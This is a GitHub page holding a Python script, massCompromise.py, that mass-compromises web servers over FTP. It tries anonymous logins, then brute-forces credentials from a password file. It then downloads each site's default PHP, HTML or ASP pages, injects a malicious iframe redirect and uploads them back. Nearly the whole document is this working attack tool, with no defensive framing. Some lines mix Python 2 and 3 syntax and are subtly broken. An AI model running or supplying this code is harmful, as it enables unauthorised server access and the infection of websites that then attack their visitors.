-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmassCompromise.py
More file actions
96 lines (88 loc) · 2.84 KB
/
massCompromise.py
File metadata and controls
96 lines (88 loc) · 2.84 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
# coding=UTF-8
import ftplib
import optparse
import time
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous','me@your.com')
print('\n[*]' + str(hostname) + 'FTP Anonymous Logon Succeeded.')
ftp.quit()
return True
except Exception as e:
print('\n[-]' + str(hostname) + 'FTP Anonymous Logon Failed.')
return False
def bruteLogin(hostname,passwdFile):
pF = open(passwdFile,'r')
for line in pF.readlines():
time.sleep(1)
userName = line.split(':')[0]
passWord = line.split(':')[1].strip('\r').strip('\n')
print('[+] Trying:' + userName + '/' + passWord)
try:
ftp = ftplib.FTP(hostname)
ftp.login(userName,passWord)
print('\n[*] ' + str(hostname) + 'FTP Logon Succeeded:' + userName + '/' + passWord)
ftp.quit()
return (userName,passWord)
except Exception,e:
pass
print('\n[-] Could not brute force FTP credentials.')
return (None,None)
def returnDefault(ftp):
try:
dirList = ftp.nlst()
except:
dirList = []
print('[-] Could not list directory contents.')
print('[-] Skipping To Next Target.')
return
retList = []
for fileName in dirList:
fn = fileName.lower()
if '.php' in fn or '.htm' in fn or '.asp' in fn:
print('[+] Found default page:' + fileName)
retList.append(fileName)
return retList
def injectPage(ftp,page,redirect):
f = open(page + '.tmp','w')
ftp.retrlines('RETR' + page,f.write)
print('[+] Downloaded Page:' + page)
f.write(redirect)
f.close()
print('[+] Injected Malicious IFrame on:' + page)
ftp.storlines('STOR' + page,open(page + '.tmp'))
print('[+] Uploaded Injected Page:' + page)
def attack(username,password,tgtHost,redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username,password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp,defPage,redirect)
def main():
parser = optparse.OptionParser('usage%prog -H <target host[s]> -r <redirect page> [-f <userpass file>]')
parser.add_option('-H',dest='tgtHosts',type='string',help='specify target host')
parser.add_option('-f',dest='passwdFile',type='string',help='specify user/password file')
parser.add_option('-r',dest='redirect',type='string',help='specify a redirection page')
(options,args) = parser.parse_args()
tgtHosts = str(options.tgtHosts).split(',')
passwdFile = options.passwdFile
redirect = options.redirect
if tgtHosts == None or redirect ==None:
print parser.usage
exit(0)
for tgtHost in tgtHosts:
username = None
password = None
if anonLogin(tgtHost) == True:
username = 'anonymous'
password = 'me@your.com'
print '[+] Using Anonymous Creds to attack'
attack(username,password,tgtHost,redirect)
elif passwdFile != None:
(username,password) = bruteLogin(tgtHost,passwdFile)
if password != None:
print('[+] Using Creds:' + username + '/' + password + 'to attack')
attack(username,password,tgtHost,redirect)
if __name__ == '__main__':
main()